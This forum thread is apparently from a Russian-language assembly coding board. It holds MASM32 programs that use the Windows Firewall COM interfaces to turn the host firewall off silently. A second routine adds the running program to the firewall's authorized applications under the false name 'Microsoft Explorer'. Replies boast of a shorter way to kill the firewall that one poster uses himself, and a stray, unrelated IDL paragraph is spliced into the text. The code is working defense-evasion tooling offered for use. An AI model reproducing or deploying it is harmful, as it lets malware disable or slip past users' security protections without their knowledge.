.586 .model flat, stdcall option casemap :none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\ole32.inc includelib \masm32\lib\ole32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib include oaidl.inc PutProperty proto :dword, :dword, :dword GetProperty proto :dword, :dword, :dword unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .data IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>> CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>> IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>> vVal VARIANT <> VarResult VARIANT <> fwMgr dd ? fwPolicy dd ? m_pFireWallProfile dd ? .code wszLocalPolicy: unicode 0, <LocalPolicy>,0 wszCurrentProfile: unicode 0, <CurrentProfile>,0 wszFirewallEnabled: unicode 0, <FirewallEnabled>,0 start: invoke OleInitialize, 0 invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult mov eax, VarResult.ppdispVal mov fwPolicy, eax invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult mov eax, VarResult.ppdispVal mov fwPolicy, eax mov m_pFireWallProfile, eax mov vVal.vt, VT_BOOL mov vVal.boolVal, VARIANT_FALSE invoke PutProperty, m_pFireWallProfile, offset wszFirewallEnabled, addr vVal coinvoke m_pFireWallProfile, IDispatch, Release coinvoke fwPolicy, IDispatch, Release coinvoke fwMgr, IDispatch, Release invoke ExitProcess, 0 ;############################################################### PutProperty proc _This:dword, pUniName:dword, pAgmnt:dword LOCAL pArm : DISPPARAMS LOCAL var_8 : dword LOCAL dispIdMember : dword mov eax, 80004003h .if _This != 0 && pAgmnt != 0 mov var_8, 0FFFFFFFDh mov eax, pAgmnt mov pArm.rgvarg, eax lea eax, var_8 mov pArm.rgdispidNamedArgs, eax mov pArm.cArgs, 1 mov pArm.cNamedArgs, 1 coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember .if eax == 0 mov ecx, pAgmnt mov cx, (VARIANT ptr [ecx]).vt xor eax, eax .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF) coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0 .endif .if eax != 0 coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0 .endif .endif .endif ret PutProperty endp ;############################################################### GetProperty proc _This:dword, pUniName:dword, pOutArg:dword LOCAL dispIdMember : dword LOCAL pArm : DISPPARAMS mov pArm.rgvarg, 0 mov pArm.rgdispidNamedArgs, 0 mov pArm.cArgs, 0 mov pArm.cNamedArgs, 0 mov eax, 80004003h .if _This != 0 coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember .if eax == 0 coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0 .endif .endif ret GetProperty endp ;############################################################### end start
The Interface Definition Language (IDL) File. An IDL file contains one or more interface definitions. Each interface definition is composed of an interface header and an interface body. The interface header is demarcated by square brackets. The interface body is contained in curly brackets. This is illustrated in the following example interface:
Corleone Зделай без ком объектов вот это. Если WinXPSP2Firewall включен, то добавляет себя в список програм. ;------------------------------------------ .586 .model flat, stdcall option casemap :none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\ole32.inc include \masm32\include\Oleaut32.inc includelib \masm32\lib\ole32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\Oleaut32.lib include oaidl.inc Initialize proto :dword Uninitialize proto :dword TurnOffWindowsFirewall proto TurnOnWindowsFirewall proto AddApplication proto :dword, :dword, :dword IsWindowsFirewallOn proto :dword, :dword PutProperty proto :dword, :dword, :dword GetProperty proto :dword, :dword, :dword CallMethod proto :dword, :dword, :dword, :dword, :dword unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .data IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>> CLSID_NetFwAuthorizedApplication GUID <0EC9846B3h, 02762h, 04A6Bh, <0A2h, 014h, 06Ah, 0CBh, 060h, 034h, 062h, 0D2h>> IID_INetFwAuthorizedApplication GUID <0B5E64FFAh, 0C2C5h, 0444Eh, <0A3h, 001h, 0FBh, 05Eh, 000h, 001h, 080h, 050h>> CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>> IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>> .code wszLocalPolicy: unicode 0, <LocalPolicy>,0 wszCurrentProfile: unicode 0, <CurrentProfile>,0 wszFirewallEnabled: unicode 0, <FirewallEnabled>,0 wszName: unicode 0, <Name>,0 wszAdd: unicode 0, <Add>,0 wszEnabled: unicode 0, <Enabled>,0 wszAuthorizedApplications: unicode 0, <AuthorizedApplications>,0 wszProcessImageFileName: unicode 0, <ProcessImageFileName>,0 wszFireWallTest: unicode 0, <Microsoft Explorer>,0 start: call WinFaerFix invoke ExitProcess, 0 ;############################################################### WinFaerFix proc uses edi esi ebx LOCAL WfProfil : dword LOCAL wszMofd[500] : byte LOCAL bWfon : dword invoke OleInitialize, 0 invoke Initialize, addr WfProfil .if eax == 0 invoke IsWindowsFirewallOn, WfProfil, addr bWfon .if eax == 0 && bWfon == VARIANT_TRUE invoke GetModuleFileNameW, 0, addr wszMofd, 500 invoke AddApplication, WfProfil, addr wszMofd, addr wszFireWallTest .endif invoke Uninitialize, WfProfil .endif ret WinFaerFix endp ;########################################################## IsWindowsFirewallOn proc uses edi esi ebx wfprf:dword, wfbol:dword LOCAL VarResult : VARIANT invoke GetProperty, wfprf, offset wszFirewallEnabled, addr VarResult .if eax == 0 mov ecx, wfbol movzx edx, VarResult.boolVal mov [ecx], edx .endif ret IsWindowsFirewallOn endp ;########################################################## AddApplication proc uses edi esi ebx wfprf:dword, lpszProcessImageFileName:dword, lpszRegisterName:dword LOCAL bAppEnable : dword LOCAL VarResult : VARIANT LOCAL bstrProcFileName : dword LOCAL vVal : VARIANT LOCAL bstrRegisterName : dword LOCAL pFWApp : dword LOCAL pFWApps : dword LOCAL result : dword invoke GetProperty, wfprf, offset wszAuthorizedApplications, addr VarResult mov result, eax .if eax == 0 mov eax, VarResult.ppdispVal mov pFWApps, eax invoke CoCreateInstance, addr CLSID_NetFwAuthorizedApplication, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwAuthorizedApplication, addr pFWApp mov result, eax .if eax == 0 invoke SysAllocString, lpszProcessImageFileName mov bstrProcFileName, eax mov eax, bstrProcFileName mov vVal.vt, VT_BSTR mov vVal.pbstrVal, eax invoke PutProperty, pFWApp, offset wszProcessImageFileName, addr vVal mov result, eax .if eax == 0 invoke SysAllocString, lpszRegisterName mov bstrRegisterName, eax mov eax, bstrRegisterName mov vVal.vt, VT_BSTR mov vVal.pbstrVal, eax invoke PutProperty, pFWApp, offset wszName, addr vVal mov result, eax .if eax == 0 mov vVal.vt, VT_DISPATCH mov eax, pFWApp mov vVal.pdispVal, eax invoke CallMethod, pFWApps, offset wszAdd, addr VarResult, 1, addr vVal mov result, eax .endif invoke SysFreeString, bstrRegisterName .endif invoke SysFreeString, bstrProcFileName .if( pFWApp ) coinvoke pFWApp, IDispatch, Release .endif .if( pFWApps ) coinvoke pFWApps, IDispatch, Release .endif .endif .endif mov eax, result ret AddApplication endp ;########################################################## Uninitialize proc uses edi esi ebx wfprf:dword coinvoke wfprf, IDispatch, Release ret Uninitialize endp ;############################################################### Initialize proc uses edi esi ebx pwfprf:dword LOCAL fwPolicy : dword LOCAL fwMgr : dword LOCAL VarResult : VARIANT LOCAL result : dword invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr mov result, eax .if eax == 0 invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult mov result, eax .if eax == 0 mov eax, VarResult.ppdispVal mov fwPolicy, eax invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult mov result, eax .if eax == 0 mov eax, VarResult.ppdispVal mov ecx, pwfprf mov [ecx], eax mov result, 0 coinvoke fwPolicy, IDispatch, Release .endif .endif coinvoke fwMgr, IDispatch, Release .endif mov eax, result ret Initialize endp ;############################################################### PutProperty proc uses edi esi ebx _This:dword, pUniName:dword, pAgmnt:dword LOCAL pArm : DISPPARAMS LOCAL NamArg : dword LOCAL dispIdMember : dword mov eax, 80004003h .if _This != 0 && pAgmnt != 0 mov NamArg, 0FFFFFFFDh mov eax, pAgmnt mov pArm.rgvarg, eax lea eax, NamArg mov pArm.rgdispidNamedArgs, eax mov pArm.cArgs, 1 mov pArm.cNamedArgs, 1 coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember .if eax == 0 mov ecx, pAgmnt mov cx, (VARIANT ptr [ecx]).vt xor eax, eax .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF) coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0 .endif .if eax != 0 coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0 .endif .endif .endif ret PutProperty endp ;############################################################### GetProperty proc uses edi esi ebx _This:dword, pUniName:dword, pOutArg:dword LOCAL dispIdMember : dword LOCAL pArm : DISPPARAMS mov pArm.rgvarg, 0 mov pArm.rgdispidNamedArgs, 0 mov pArm.cArgs, 0 mov pArm.cNamedArgs, 0 mov eax, 80004003h .if _This != 0 && pOutArg != 0 coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember .if eax == 0 coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0 .endif .endif ret GetProperty endp ;############################################################### CallMethod proc uses edi esi ebx _This:dword, MetName:dword, VarRes:dword, numArg:dword, pArgArray:dword LOCAL pArm : DISPPARAMS LOCAL dispIdMember : dword mov eax, pArgArray mov pArm.rgvarg, eax mov eax, numArg mov pArm.cArgs, eax mov pArm.rgdispidNamedArgs, 0 mov pArm.cNamedArgs, 0 mov eax, 80004003h .if _This != 0 && VarRes != 0 coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr MetName, 1, LOCALE_USER_DEFAULT, addr dispIdMember .if eax == 0 coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, addr pArm, VarRes, 0, 0 .if eax != 0 coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, VarRes, 0, 0 .endif .endif .endif ret CallMethod endp ;########################################################## end start
Аноним Я не пойму сложности вопроса отключения стандартного фаера. Пример приводить не буду, т.к. кое где сам юзаю, но лишь скажу что без проверок на ошибки в асме он занимает 5 строк, никаких ком-объектов, драйверов и манипуляций с памятью не проводится, смотрите проще!
дело не в сложности, а в адекватности. На разговор - отвечаем разговором. На пример - примером. Если на пример отвечем разговором - это и есть "нимдеть - это не камушки ворочать". типа прибить процес это большой секрет
Hey,Аноним ;--------------------------------------------------------- IDispatch_ReleaseProto typedef proto IDispatch_Release typedef ptr IDispatch_ReleaseProto ;--------------------------------------------------------- could it pass ML?
